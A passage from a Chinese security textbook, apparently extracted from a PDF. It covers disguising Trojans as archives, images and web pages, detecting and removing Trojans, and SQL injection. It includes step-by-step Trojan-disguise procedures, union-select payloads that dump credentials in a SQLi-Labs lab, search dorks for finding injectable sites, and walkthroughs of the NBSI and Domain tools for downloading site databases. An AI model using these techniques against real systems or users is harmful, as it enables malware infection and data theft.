Step08设置完毕后，单击“确定”按钮，返回“压缩文件名和参数”对话框。在“注释”选项
卡中可以看到自己所设置的各项参数，如图 6-20所示。



　　　　　　
图 6-19 “文本和图标”选项卡图 6-20 “注释”选项卡

Step09单击“确定”按钮，即可生成一个名为“蜘蛛纸牌”自解压的压缩文件。这样用户一旦
运行该文件后就会中木马，如图 6-21所示。

图 6-21 “蜘蛛纸牌”自解压压缩文件 
6.2.3.将木马伪装成图片
将木马伪装成图片是许多木马制造者常用来骗别人执行木马的方法，如，将木马伪装成 GIF、 

JPG等，这种方式可以使很多人中招。用户可以使用图片木马生成器工具将木马伪装成图片，具体微视频的操作步骤如下。 

Step01下载并运行“图片木马生成器”程序，打开“图片木马生成器”主窗口，如图 6-22所示。 

Step02在“网页木马地址”和“真实图片地址”文本框中分别输入网页木马和真实图片地址，
在“选择图片格式”下拉列表中选择 jpg选项，如图 6-23所示。 

Step03单击“生成”按钮，随即弹出“图片木马生成完毕”提示框，单击“确定”按钮，关闭
该提示框，这样只要打开该图片，就可以自动把该地址的木马下载到本地并运行，如图 6-24所示。





　　　　
图 6-22 “图片木马生成器”主窗口图 6-23 设置图片信息图 6-24 信息提示框 
6.2.4.将木马伪装成网页

网页木马实际上是一个 HTML网页，与其他网页不同，该网页是黑客精心制作的，用户一旦微视频
97

访问了该网页就会中木马。下面以最新网页木马生成器为例介绍制作网页木马的过程。提示：在制作网页木马之前，必须有一个木马服务器端程序，在这里使用木马文件“木马 .exe”。 

Step01运行“最新网页木马生成器”主程序后，即可打开其主窗口，如图 6-25所示。 

Step02单击“选择木马”文本框右侧的“浏览”按钮，打开“另存为”对话框，在其中选择刚
才准备的木马文件“木马 .exe”，如图 6-26所示。


　　　　


图 6-25 “最新网页木马生成器”主窗口 1 图 6-26 “另存为”对话框 

Step03单击“保存”按钮，返回“最新网页木马生成器”主窗口。在“网页目录”文本框中输
入相应的网址，如 http://www.index.com/，如图 6-27所示。 

Step04单击“生成目录”文本框右侧的“浏览”按钮，打开“浏览文件夹”对话框，在其中选
择生成目录保存的位置，如图 6-28所示。


　　　　


　　　　图 6-27 输入网址　图 6-28 “浏览文件夹”对话框 

Step05单击“确定”按钮，返回“最新网页木马生成器”主窗口，如图 6-29所示。 

Step06单击“生成”按钮，即可弹出一个信息提示框，提示用户网页木马创建成功！单击“确
定”按钮，即可成功生成网页木马，如图 6-30所示。


　　　　　　


图 6-29 “最新网页木马生成器”主窗口 2 图 6-30 信息提示框 

Step07在“动鲨网页木马生成器”目录下的“动鲨网页木马”文件夹中将生成 bbs003302.css、 bbs003302.gif以及 index.htm等 3个网页木马。其中 index.htm是网站的首页文件，而另外两个是调用文件，如图 6-31所示。 

Step08将生成的三个木马上传到前面设置的存在木马的 Web文件夹中，当浏览者一旦打开这个网页，浏览器就会自动在后台下载指定的木马程序并开始运行。
提示：在设置存放木马的 Web文件夹路径时，设置的路径必须是某个可访问的文件夹，一般位于自己申请的一个免费网站上。 
6.3.检测与查杀木马
木马是黑客最常用的攻击方法，其危害程度越来越严重，对计算机系统有强大的控制和破坏能力，如窃取主机的密码、控制目标主机的操作系统和文件等。 
6.3.1.通过进程检测木马
由于木马也是一个应用程序，一旦运行，就会在计算机系统的内存中驻留进程。因此，用户可

图 6-31 “动鲨网页木马”文件夹


以通过系统自带的 Windows任务管理器来检测系统中是否存在木马进程。具体的操作步骤如下。 微视频

Step01在 Windows系统中，按 Ctrl+Alt+Delete组合键，打开“ Windows任务管理器”窗口，
如图 6-32所示。 

Step02选择“进程”选项卡，选中某个进程并右击，从弹出的快捷菜单中选择相应的命令，即
可对进程进行相应的管理操作，如图 6-33所示。
另外，用户还可以利用进程管理软件来检查系统进程并发现木马。常用的工具软件是“ Windows进程管理器”，该软件可以更全面地对进程进行管理。其最大的特点是包含了几乎全部的 Windows系统进程和大量的常用软件进程以及木马进程。
99


　　


　　　图 6-32 “Windows任务管理器”窗口图 6-33 “进程”选项卡
使用 Windows进程管理器查询系统中的木马的操作步骤如下。 

Step01下载并解压缩 Windows进程管理器软件后，其包含的 4个文件如图 6-34所示。 

Step02双击“补丁”文件夹将其打开，在其中可以看到 Windows进程管理器的补丁程序和补
丁说明文件，如图 6-35所示。


　　


图 6-34 Windows进程管理器文件夹图 6-35 “补丁”文件夹 

Step03双击补丁应用程序，打开“ Windows进程管理器补丁程序”对话框，在其中显示了补丁
介绍以及详细信息，如图 6-36所示。 

Step04单击“应用补丁”按钮，即可应用补丁程序，并弹出“提示”对话框，提示用户补丁应
用成功，如图 6-37所示。



　　　　　　　　
　　　　　图 6-36 补丁信息图 6-37 补丁应用成功

Step05单击“确定”按钮，关闭“提示”对话框。然后双击 Windows进程管理器启动程序，
打开“ Windows进程管理器”窗口。其中显示了系统当前正在运行的所有进程，与“ Windows任务管理器”窗口中的进程列表是完全相同的，如图 6-38所示。

图 6-38 系统进程信息 

Step06在列表中选其中某个进程选项之后，单击“描述”按钮，即可看到该进程的详细信息，
如图 6-39所示。

图 6-39 进程的详细信息 

Step07单击“模块”按钮，即可查看该进程的模块信息，如图 6-40所示。 

Step08在进程列表中右击某个进程，就可以对其进行结束、暂停、查看属性、删除文件等操作，
如图 6-41所示。

图 6-40 进程模块信息

图 6-41 “结束进程”命令
提示：按进程的安全等级进行了颜色区分。
　　　①黑色表示的是正常进程（正常的系统或应用程序进程，安全）；
　　　②蓝色表示可疑进程（容易被病毒或木马利用的正常进程，需要留心）；
　　　③红色表示病毒 &木马进程（危险）。 

6.3.2.使用《360安全卫士》查杀木马
使用《 360安全卫士》可以查询系统中的顽固木马病毒文件，以保证系统安全。使用《 360安全卫士》查杀顽固木马病毒的操作步骤如下。


病毒查杀工作界面，如图 6-42所示。

图 6-42 《360安全卫士》木马病毒查杀工作界面 
Step02单击“快速查杀”按钮，开始快速扫描系统关键位置，如图 6-43所示。
图 6-43 扫描木马信息 

也可以直接单击“一键处理”按钮，对扫描出来的危险项进行处理，如图 6-44所示。 

Step04单击“一键处理”按钮，开始处理扫描出来的危险项，处理完成后，弹出 “360木马查杀”
对话框，提示用户处理成功，如图 6-45所示。



　　
　　　图 6-44 扫描出的危险项　图 6-45 “360木马查杀”对话框
6.3.3.使用《木马专家》清除木马
《木马专家 2022》是专业防杀木马软件，针对目前流行的木马病毒特别有效，可以彻底查杀各种流行的 QQ盗号木马、网游盗号木马、灰鸽子、黑客后门等十万种木马间谍程序，是计算机不可缺少的坚固堡垒。使用木马专家查杀木马的具体操作步骤如下。 

Step01双击桌面上的《木马专家 2022》快捷图标，即可打开如图 6-46所示启动界面，提示用
户程序正在载入。 

Step02程序载入完成后，弹出“木马专家 2022”工作界面，如图 6-47所示。

　


图 6-46 木马专家启动界面图 6-47 “木马专家 2022”工作界面 

Step03单击“扫描内存”按钮，弹出“扫描内存”提示框，提示用户是否使用云鉴定全面分析
系统，如图 6-48所示。 

Step04单击“确定”按钮，即可开始对计算机内存进行扫描，如图 6-49所示。

　


　图 6-48 “扫描内存”提示框图 6-49 扫描计算机内存 

Step05扫描完成后，会在右侧的窗格中显示扫描的结果，如果存在木马，直接将其删除即可，
如图 6-50所示。 

Step06单击“扫描硬盘”按钮，进入“硬盘扫描分析”工作界面，在其中提供了三种扫描模式，
分别是开始快速扫描、开始全面扫描与开始自定义扫描，用户可以根据自己的需要进行选择，如图 6-51所示。


　


　　　图 6-50 显示扫描的结果　　　图 6-51 “硬盘扫描分析”工作界面 

Step07这里单击“开始快速扫描”按钮，即可开始对计算机进行快速扫描，如图 6-52所示。 

Step08扫描完成后，会在右侧的窗格中显示扫描的结果，如图 6-53所示。


　


　　　　图 6-52 快速扫描木马　　　图 6-53 快速扫描结果 

Step09单击“系统信息”按钮，进入“系统信息”工作界面，在其中可以查看计算机内存与 
CPU的使用情况，同时可以对内存进行优化处理，如图 6-54所示。 

Step10单击“系统管理”按钮，进入“系统管理”工作界面，在其中可以对计算机的进程、启
动项等内容进行管理操作，如图 6-55所示。



　
　图 6-54 “系统信息”工作界面图 6-55 “系统管理”工作界面

Step11单击“高级功能”按钮，进入“高级功能”工作界面，在其中可以对计算机进行系统修复、
隔离仓库等高级功能的操作，如图 6-56所示。 

Step12单击“其他功能”按钮，进入“其他功能”工作界面，在其中可以查看网络状态、监控
日志等，同时还可以对 U盘病毒进行免疫处理，如图 6-57所示。


　


　图 6-56 “高级功能”工作界面图 6-57 “其他功能”工作界面 

Step13单击“注册更新”按钮，并单击其下方的“功能设置”按钮，即可在打开的界面中
设置《木马专家 2022》的相关功能，如图 6-58所示。

图 6-58 “功能设置”工作界面 
6.4.实战演练 
6.4.1.实战1：在 Word中预防宏病毒

微视频包含宏的工作簿更容易感染病毒，所以用户需要提高宏的安全性。下面以在 Word 2016中预防宏病毒为例，来介绍预防宏病毒的方法，具体操作步骤如下。 

Step01打开包含宏的工作簿，选择“文件”→“选项”，如图 6-59所示。 

Step02打开“ Word选项”对话框，选择“信任中心”选项，然后单击“信任中心设置”按钮，
如图 6-60所示。


　　


　图 6-59 选择“选项”图 6-60 “Word选项”对话框 

Step03弹出“信任中心”对话框，在左侧列表中选择“宏设置”选项，然后在“宏设置”列表
中选中“禁用无数字签署的所有宏”单选按钮，单击“确定”按钮，如图 6-61所示。

图 6-61 “信任中心”对话框 
6.4.2.实战2：在安全模式下查杀病毒
安全模式的工作原理是在不加载第三方设备驱动程序的情况下启动计算机，使计算机运行在

系统最小模式，这样用户就可以方便地查杀病毒，还可以检测与修复计算机系统的错误。下面以 微视频
Windows 10操作系统为例来介绍在安全模式下查杀病毒并修复系统错误的方法。具体的操作步骤如下。 
Step01按 WIN+R组合键，弹出“运行”对话框，在“打开”文本框中输入 msconfig命令，单击“确定”按钮，如图 6-62所示。 


Step02弹出“系统配置”对话框，在“引导”选项卡中，勾选“安全引导”复选框，并选中“最
小”单选按钮，如图 6-63所示。 

Step03单击“确定”按钮，即可进入系统安全模式，如图 6-64所示。 

Step04进入安全模式后，即可运行杀毒软件，进行病毒的查杀，如图 6-65所示。
107

　


　　图 6-62 “运行”对话框图 6-63 “系统配置”对话框

　


　　图 6-64 系统安全模式图 6-65 查杀病毒
第章
7



SQL注入攻击的防范 
SQL注入（ SQL Injection）攻击，是众多针对脚本系统的攻击中最常见的一种攻击手段，也是危害最大的一种攻击方式。由于 SQL注入攻击易学易用，使得网上各种 SQL注入攻击事件成风，对网站安全的危害十分严重。本章介绍 SQL注入攻击的安全防护。 
7.1.什么是 SQL注入 
SQL注入是一种常见的 Web安全漏洞，攻击者利用这个漏洞，可以访问或修改数据，或利用

潜在的数据漏洞进行攻击。 微视频
7.1.1.认识 
SQL 

SQL语言，也被称为结构化查询语言（ Structured Query Language），是一种特殊的编程语言，用于存取数据以及查询、更新和管理关系数据库系统。由于它具有功能丰富、使用方便灵活、语言简洁易学等突出的优点，深受计算机用户的欢迎。 

7.
1.2.SQL注入漏洞的原理


针对 SQL注入的攻击行为可描述为通过用户可控参数中注入 SQL语法，破坏原有 SQL结构，达到编写程序时意料之外结果的攻击行为。其成因可以归结为以下两方面。
（1）程序编写者在处理程序和数据库交互时，使用字符串拼接的方式构造 SQL语句。

（2）未对用户可控参数进行足够的过滤便将参数内容拼接进入 SQL语句中。 


7.
1.3.注入点可能存在的位置

根据 DQL注入漏洞的原理，在用户“可控参数”中输入 SQL语法，也就是说 Web应用在获取用户数据的地方，只要带入数据库查询，都存在 SQL注入的可能。这些地方通常包括 GET数据、 POST数据、HTTP头部（HTTP请求报文其他字段）、 Cookie数据等。 

7.
1.4.SQL注入点的类型


不同的数据库的函数、注入方法都是有差异的，所以在注入前还要对数据库的类型进行判断。按提交参数类型分，SQL注入点可以分为如下 3种。
（1）数字型注入点。这类注入的参数是“数字”，所以称为“数字型”注入点，例如“ http:// 
*
****?ID=98”。这类注入点提交的 SQL语句，其原形大致为：Select * from 表名 where 字段 =98。当提交注入参数为“ http://*****?ID=98 And[查询条件 ]”时，向数据库提交的完整 SQL语句为： Selet * from 表名 where 字段 =98 And [查询条件 ]。

（2）字符型注入点。这类注入的参数是“字符”，所以称为“字符型”注入点，例如“ http:// 

*
****?Class=日期”。这类注入点提交的 SQL语句，其原形大致为： Select * from 表名 where 字段 ='日期 '。当提交注入参数为“ http://*****?Class=日期 And[查询条件 ]”时，向数据库提交的完整 SQL语句为：Select * from 表名 where 字段 '日期 ' and [查询条件 ]。

（3）搜索型注入点。这是一类特殊的注入类型，这类注入主要是指在进行数据搜索时没过滤搜索参数，一般在链接地址中有“ keyword=关键字”，有的不显示明显的链接地址，而是直接通过搜索框表单提交。


搜索型注入点提交的 SQL语句，其原形大致为： Select * from 表名 where 字段 like '%关键字 %'。当提交注入参数为“ keyword='and [查询条件 ] and'%'='”，则向数据库提交的完整 SQL语句为： Select * from 表名 where 字段 like '%' and [查询条件 ] and '%'='%'。 
7.1.5.SQL注入漏洞的危害
攻击者利用 SQL注入漏洞，可以获取数据库中的多种信息，如管理员后台密码，从而获取数据库中的内容，在特殊情况下还可以修改数据库内容或者插入内容到数据库。如果数据库权限分配存在问题，或者数据库本身存在缺陷，那么攻击者可以通过 SQL注入漏洞直接获取 webshell或者服务器系统权限。 
7.2.搭建 SQL注入平台 
SQLi-Labs是一款学习 SQL注入的开源平台，共有 75种不同类型的注入。本节介绍如何使用 SQLi-Labs搭建 SQL注入平台。 
7.2.1.认识 SQLi-Labs 
SQLi-Labs是一个专业的 SQL注入练习平台，适用于 GET和 POST场景，包含多个 SQL注入点，如基于错误的注入、基于误差的注入、更新查询注入、插入查询注入等。 
SQLi-Labs的下载地址为：https://github.com/Audi-1/sqli-labs，如图 7-1所示。

图 7-1 SQLi-Labs的下载
7.2.2.搭建开发环境
在安装 SQLi-Labs之前，需要做一个准备工作，这里要搭建一个 PHP+Mysql+Apache的环境。本书使用 WampServer组合包进行搭建， WampServer组合包是将 Apache、PHP、MySQL等服务器软件安装配置完成后打包处理。因为其安装简单、速度较快、运行稳定，所以受到广大初学者的青睐。
注意：在安装 WampServer组合包之前，需要确保系统中没有安装 Apache、PHP和 MySQL，
否则，需要先将这些软件卸载，然后才能安装 WampServer组合包。
安装 WampServer组合包的具体操作步骤如下。 

Step01到 WampServer官方网站 http://www.wampserver.com/en/下载 WampServer的最新安装包
文件。 

Step02直接双击安装文件，打开选择安装语言界面，如图 7-2所示。 

Step03单击 OK按钮，在打开的窗口中选中 I accept the agreement单选按钮，如图 7-3所示。

　　


　图 7-2 选择安装语言界面　　　图 7-3 接受许可证协议 

Step04单击 Next按钮，打开 Information窗口，在其中可以查看组合包的相关说明信息，如图 7-4
所示。 

Step05单击 Next按钮，在打开的 Select Destination Location窗口中设置安装路径，这里采用默
认路径 c:\wamp，如图 7-5所示。



　
　图 7-4 Information窗口　　　　　　　图 7-5 Select Destination Location窗口

Step06单击 Next按钮，打开 Select Components窗口，勾选 MySQL复选框，其他选项采用默认设置，如图 7-6所示。 

Step07单击 Next按钮，在打开的 Ready to Install窗口中确认安装的参数后，单击 Install按钮，如图 7-7所示。


　


图 7-6 Select Components窗口图 7-7 Ready to Install窗口 

Step08程序开始自动安装，并显示安装进度，如图 7-8所示。 

Step09安装完成后，进入安装完成界面，单击 Finish按钮，完成 WampServer的安装操作，如图 7-9所示。


　


图 7-8 开始安装程序图 7-9 完成安装界面 

Step10默认情况下，程序安装完成后的语言为英语，这里为了初学者方便，右击桌面右侧的 
WampServer服务按钮
，在弹出的菜单中选择 Language命令，然后在弹出的子菜单中选择 chinese命令，如图 7-10所示。 

Step11单击桌面右侧的 WampServer服务按钮
，在弹出的菜单中选择 Localhost命令，如图 7-11所示。
提示：这里的 www目录就是网站的根目录，所有的测试网页都放到这个目录下。 

Step12系统自动打开浏览器，显示 PHP配置环境的相关信息，如图 7-12所示。


　　　　　　　　


　　图 7-10 WampServer服务列表图 7-11 选择 Localhost菜单命令

图 7-12 PHP配置环境的相关信息 
7.2.3.安装 SQLi-Labs 
PHP调试环境搭建完成后，下面就可以安装 SQLi-Labs了，具体的操作步骤如下。 

Step01单击 WampServer服务按钮


，在弹出的菜单中选择“启动所有服务”命令，如图 7-13所示。 

Step02将下载的 SQLi-Labs.zip解压到 wamp网站根目录下，这里的路径是 C:\wamp\www\sqli-labs，如图 7-14所示。



　　　　　　　

　图 7-13 “启动所有服务”菜单命令图 7-14 解压 SQLi-Labs.zip 

Step03修改 db-creds.inc代码，这里配置文件路径是 C:\wamp\www\sqli-labs\sql-connections，默认 mysql数据库地址是“ 127.0.0.1或 localhost”，用户名和密码都是 root。主要修改 $dbpass为 root，这很重要，修改后保存文件即可，如图 7-15所示。 

Step04在浏览器中打开 http://127.0.0.1/sqli-labs/访问首页，如图 7-16所示。

　　


　图 7-15 修改 db-creds.inc代码图 7-16 访问首页 

Step05单击 Setup/reset Database以创建数据库，创建表并填充数据，如图 7-17所示。至此，就完成了 SQLi-Labs的安装。

图 7-17 完成 SQLi-Labs的安装
除了使用 PHP创建数据库外，还可以在 phpMyAdmin中恢复数据库，具体的操作步骤如下。 
Step01单击 WampServer服务按钮

，在弹出的菜单中选择 phpMyAdmin命令，如图 7-18所示。 

Step02打开 phpMyAdmin欢迎界面，在“用户名”文本框中输入 root，密码为空，如图 7-19所示。 

Step03单击“执行”按钮，在打开的界面中选择“导入”选项卡，进入“导入到当前服务器”
界面，如图 7-20所示。

　　　　


　图 7-18 phpMyAdmin菜单命令图 7-19 phpMyAdmin欢迎界面 

Step04单击“浏览”按钮，打开“打开”对话框，在其中选择要导入的 SQL数据库文件，如图 7-21所示。


　　


图 7-20 “导入到当前服务器”界面图 7-21 “打开”对话框 

Step05单击“打开”按钮，返回“导入到当前服务器”界面中，可以看到导入的数据库文件，
单击“执行”按钮，如图 7-22所示。 

Step06数据库导入完毕后，可以看到界面中有导入成功信息提示，如图 7-23所示。



　

图 7-22 导入数据库文件图 7-23 导入成功信息提示
7.2.4.SQL注入演示
在浏览器中打开 http://127.0.0.1/sqli-labs/，可以看到有很多不同的注入点，分为基本 SQL注入、高级 SQL注入、 SQL堆叠注入、挑战四个部分，总共约 75个 SQL注入漏洞。如图 7-24所示，单击相应的超链接，即可在打开的页面中查看具体的注入点介绍。

图 7-24 查看注入点
本节演示通过 Less-1 GET-Error based-Single quotes-String（基于错误的 GET单引号字符型注入）注入点来获取数据库用户名与密码的过程，具体的操作步骤如下。 

Step01在浏览器中输入 http://127.0.0.1/sqli-labs/Less-1/?id=1并运行，发现可以正确显示信息，如图 7-25所示。

图 7-25 显示信息 

Step02查看是否存在注入。在 http://127.0.0.1/sqli-labs/Less-1/?id=1后面加入单引号，即在浏览器中运行 http://127.0.0.1/sqli-labs/Less-1/?id=1'，发现结果出现报错信息，说明存在注入，如图 7-26所示。

图 7-26 报错信息

Step03利用 order by语句逐步判断其表格有几列。在浏览器中运行 http://127.0.0.1/sqli-labs/ Less-1/?id=1' order by 3--+;，从结果中发现表格有三列，如图 7-27所示。

图 7-27 判断表格有几列 

Step04判断其第几列有回显，这里注意 id后面的数字要采用一个不存在的数字，比如 -1 -100
都可以，这里用的是 -1。在浏览器中运行 http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3--+;，从结果中发现 2、3列有回显，如图 7-28所示。

图 7-28 判断第几列有回显 

Step05查看数据库、列以及用户名和密码。在浏览器中运行 http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,database()--+;，可以查看数据库名字，如图 7-29所示。

图 7-29 查看数据库名字

Step06知道数据库名字以后可以查看数据库信息。在浏览器中运行 http://127.0.0.1/sqli-labs/ Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables--+;，如图 7-30所示。

图 7-30 查看数据库信息 

Step07查询用户名和密码。在浏览器中运行 http://127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,2, group_concat(concat_ws('~',username,password)) from security.users--+;，如图 7-31所示。

图 7-31 查询用户名和密码 
7.3.SQL注入攻击的准备
用户搭建的 SQL注入平台可以帮助我们演示 SQL注入的过程，本节介绍 SQL注入攻击的准备。 

7.3.1.攻击前的准备
黑客在实施 SQL注入攻击前会进行一些准备工作，同样，要对自己的网站进行 SQL注入漏洞
微视频的检测，也需要进行相同的准备。 
1.取消显示友好 HTTP错误信息

在进行 SQL注入攻击时，需要利用从服务器上返回各种出错信息，但在浏览器中默认设置时不显示详细错误返回信息的，所以通常只能看到“ HTTP 500服务器错误”提示信息。因此，在进行 SQL注入攻击之前需要先设置 IE浏览器。具体的设置步骤如下。 

Step01在 IE浏览器窗口中，选择“工具” →“Internet选项”命令，即可打开“ Internet选项”
对话框，如图 7-32所示。 

Step02选择“高级”选项卡，取消勾选“显示友好 HTTP错误信息”复选框之后，单击“确定”
按钮，即可完成设置，如图 7-33所示。


　　　　


　　图 7-32 “Internet选项”命令图 7-33 取消显示友好 HTTP错误信息 
2.准备猜解用的工具

与其他攻击手段相似，在进行每一次入侵前，都要经过检测漏洞、入侵攻击、种植木马后门长期控制等几个步骤，同样，进行 SQL注入攻击也不例外。在这几个入侵步骤中，黑客往往会使用一些特殊的工具，以大大提高入侵的效率和成功率。在进行 SQL注入攻击测试前，需要准备如下攻击工具。
（1）SQL注入漏洞扫描器与猜解工具。 ASP环境的注入扫描器主要有 NBSI、HDSI、Pangolin_ bin、WIS+WED和冰舞等，其中 NBSI工具可对各种注入漏洞进行解码，从而提高猜解效率，如图 7-34所示。

图 7-34 常用的 ASP注入工具 NBSI 
冰舞是一款针对 ASP脚本网站的扫描工具，可全面寻找目标网站存在的漏洞，如图 7-35所示。

图 7-35 冰舞主窗口
（2）Web木马后门。 Web木马后门用于注入成功后，安装在网站服务器上用来控制一些特殊的木马后门。常见的 Web木马后门有“冰狐浪子 ASP”木马、海阳顶端网 ASP木马等，这些都是用于注入攻击后控制 ASP环境的网站服务器。

（3）注入辅助工具。由于某些网站可能会采取一些防范措施，所以在进行 SQL注入攻击时，还需要借助一些辅助的工具，来实现字符转换、格式转换等功能。常见的 SQL注入辅助工具有“ASP木马 C/S模式转换器”和“C2C注入格式转换器”等。 


7.3.2.寻找攻击入口
查找可攻击网站是成功实现注入的前提条件。只有 ASP、PHP、JSP等动态网页才可能存在注

微视频入漏洞。一般情况下， SQL注入漏洞存在于 http://www.xxx.xxx/abc.asp?id=yy等带有参数的 ASP动态网页中。因为只要带有参数的动态网页且该网页访问了数据库，就可能存在 SQL注入漏洞。如果程序员没有安全意识，没有对必要的字符进行过滤，则其构建的网站存在 SQL注入的可能性就很大。
在浏览器中搜索注入站点的步骤如下。 

Step01在浏览器的地址栏中输入网址 www.baidu.com，打开 baidu搜索引擎，输入 allinurl:asp?id=

进行搜索，如图 7-36所示。 
Step02打开百度搜索引擎，在搜索文本中输入 allinurl:php?id=进行搜索，如图 7-37所示。利用专门注入工具检测网站是否存在注入漏洞时，也可在动态网页地址的参数后加上一个单引
号，如果出现错误则可能存在注入漏洞。由于通过手工方法进行注入检测的猜解效率低，所以最好是使用专门的软件进行检测。


　


图 7-36 搜索网址含有中 asp?id=的网页图 7-37 搜索网址含有中 php?id=的网页 
NBSI可以在图形界面下对网站进行注入漏洞扫描。运行程序后单击工具栏上的“网站扫描”按钮，在“网站地址”栏中输入扫描的网站链接地址，再选择扫描方式。第一次扫描时，可以选中
“快速扫描”单选按钮，如果使用该方式没有扫描到漏洞，再使用“全面扫描”。单击“扫描”按钮，即可在下面的列表中看到可能存在 SQL注入的链接地址，如图 7-38所示。在扫描结果列表中将会显示注入漏洞存在的可能性，其中标记为“可能性：极高”的，注入成功的概率较大。

图 7-38 NBSI扫描 SQL注入点 
7.4.常见的注入工具 
SQL注入工具有很多，常见的注入工具包括 NBSI注入工具、 Domain注入工具等。本节介绍常见注入工具的使用。
7.4.1.NBSI注入工具 
NBSI（网站安全漏洞检测工具，又叫 SQL注入分析器）是一套高集成性 Web安全检测系统，是由 NB联盟编写的一个非常强的 SQL注入工具。使用它可以检测出各种 SQL注入漏洞并进行解码，提高猜解效率。
使用 NBSI可以检测出网站中存在的注入漏洞，并对其进行注入攻击，具体步骤如下。 

Step01运行 NBSI主程序，即可打开 NBSI主窗口，如图 7-39所示。 

Step02单击“网站扫描”按钮，即可进入“网站扫描”窗口，如图 7-40所示。在“网站地址”
中输入要扫描的网站地址，这里选择本地创建的网站，选中“快速扫描”单选按钮。


　


　图 7-39 NBSI主窗口图 7-40 网站扫描窗口 

Step03单击“扫描”按钮，即可对该网站进行扫描。如果在扫描过程中发现注入漏洞，会将漏
洞地址及其注入性的高低显示在“扫描结果”列表中，如图 7-41所示。

图 7-41 扫描后的结果 

Step04在“扫描结果”列表中单击要注入的网址，即可将其添加到下面的“注入地址”文本框中，
如图 7-42所示。

图 7-42 添加要注入的网站地址 

Step05单击“注入分析”按钮，即可进入“注入分析”窗口中，如图 7-43所示。在其中勾选 
Post复选框，在“特征字符”文本区域中输入相应的特征字符。 

Step06设置完毕后，单击“检测”按钮即可对该网址进行检测，其检测结果如图 7-44所示。如
果待检测完毕之后，“未检测到注入漏洞”单选按钮被选中，则该网址是不能被用来进行注入攻击的。


　


　图 7-43 “注入分析”窗口图 7-44 对选择的网站进行检测
注意：这里得到的是一个数字型 +Access数据库的注入点，ASP+MSSQL型的注入方法与其一样，都可以在注入成功之后去读取数据库的信息。 

Step07在 NBSI主窗口中单击“扫描及工具”按钮右侧的下拉箭头，在弹出的快捷菜单中选择 
“Access数据库地址扫描”命令，如图 7-45所示。 

Step08在打开的“扫描及工具”窗口，将前面扫描出来的“可能性：较高”的网址复制到“扫
描地址”文本框中，并勾选“由根目录开始扫描”复选框，如图 7-46所示。 

Step09单击“开始扫描”按钮，即可将可能存在的管理后台扫描出来，其结果会显示在“可能
存在的管理后台”列表中，如图 7-47所示。 

Step10将扫描出来的数据库路径进行复制，将该路径粘贴到 IE浏览器的地址栏中，即可自动
打开浏览器下载功能，并弹出“另存为”对话框，或使用其他的下载工具，如图 7-48所示。


　


　　图 7-45 “Access数据库地址扫描”命令图 7-46 “扫描及工具”窗口


　


图 7-47 可能存在的管理后台图 7-48 “另存为”对话框 

Step11单击“保存”按钮，即可将该数据下载到本地磁盘中，打开后结果如图 7-49所示，这
样就掌握了网站的数据库了，实现了 SQL注入攻击。

图 7-49 数据库文件
在一般情况下，扫描出来的管理后台不止一个，此时可以选择默认管理页面，也可以逐个进行测试，利用破解出的用户名和密码进入其管理后台。
7.4.2.Domain注入工具 
Domain是一款出现最早，而且功能非常强大的 SQL注入工具，具有旁注检测、 SQL猜解、密码破解、数据库管理等功能。 
1.使用 Domain实现注入
使用 Domain实现注入的具体操作步骤如下。 


Step01先下载并解压 Domain压缩文件，双击“ Domain注入工具”的应用程序图标，即可打开 
“Domain注入工具”主窗口，如图 7-50所示。 

Step02单击“旁注检测”选项卡，在“输入域名”文本框内输入需要注入的网站域名，单击右
侧的
按钮，即可检测出该网站域名所对应的 IP地址，单击“查询”按钮，即可在窗口左下部分
列表中列出相关站点信息，如图 7-51所示。

　


图 7-50 “Domain注入工具”主窗口图 7-51 “旁注检测”页面 

Step03选中右侧列表中的任意一个网址并单击“网页浏览”按钮，即可打开“网页浏览”页面，
可以看到页面最下方的“注入点”列表中列出了所有刚发现的注入点，如图 7-52所示。 

Step04单击“二级检测”按钮，即可进入“二级检测”页面，分别输入域名和网址后可查询二
级域名以及检测整站目录，如图 7-53所示。



　
　　图 7-52 “网页浏览”页面图 7-53 “二级检测”页面

Step05若单击“网站批量检测”按钮，即可打开“网站批量检测”页面，在该页面中可查看待
检测的几个网址，如图 7-54所示。 

Step06单击“添加指定网址”按钮，即可打开“添加网址”对话框，如图 7-55所示，在其中
输入要添加的网址。单击 OK按钮，即可返回“网站批量检测”页面。

　　


　　图 7-54 “网站批量检测”页面图 7-55 “添加网址”对话框 

Step07单击页面最下方的
按钮，即可成功分析出该网站中所包含的页面，如图 7-56所示。

图 7-56 成功分析网站中所包含的页面 

Step08单击“保存结果”按钮，即可打开 Save As对话框，在其中输入想要保存的名称。单击 
Save按钮，即可将分析结果保存至目标位置，如图 7-57所示。

Step09单击“功能设置”按钮，即可对浏览

网页时的个别选项进行设置，如图 7-58所示。 

Step10在“Domain注入工具”主窗口中选择 

“SQL注入”选项卡，单击“批量扫描注入点”按钮，即可打开“扫描注入点”标签页。单击“载入查询网址”按钮，即可在“扫描注入点”下方的列表中，显示出关联的网站地址。选中与前面设置相同的网站地址，最后单击右侧的“批量分析注入点”按钮，即可在窗口最下方的“注入点”列表中，显示检测到并可注入的所有注入点，如图 7-59所示。

图 7-57 保存分析页面结果



　
　　图 7-58 “功能设置”页面


Step11单击“ SQL注入猜解检测”按钮，在“注入点”地址栏中输入上面检测到的任意一条注入点，如图 7-60所示。 

Step12单击“开始检测”按钮并在“数据库”列表下方单击“猜解表名”按钮，在“列名”列表下方单击“猜解列名”按钮；最后在“检测结果”列表下方单击“猜解内容”按钮，稍等几秒钟后，即可在检测信息列表中看到 SQL注入猜解检测的所有信息，如图 7-61所示。
　　　图 7-59 “扫描注入点”标签页 



　
图 7-60 “SQL注入猜解检测”页面图 7-61 SQL注入猜解检测的所有信息
2.使用 Domain扫描管理后台

使用 Domain扫描管理后台的方法很简单，具体的操作步骤如下。 

Step01在“Domain注入工具”的主窗口中选择“ SQL注入”选项卡，再单击“管理入口扫描”按钮，即可进入“管理入口扫描”标签页，如图 7-62所示。 

Step02在“注入点”地址栏中输入前面扫描到的注入地址，并根据需要选中“从当前目录开始
扫描”单选按钮，最后单击“扫描后台地址”按钮，即可开始扫描并在下方的列表中显示所有扫描到的后台地址，如图 7-63所示。


　


图 7-62 “管理入口扫描”标签页图 7-63 扫描后台地址 

Step03单击“检测设置区”按钮，在该页面中可看到“设置表名”“设置字段”和“后台地址”
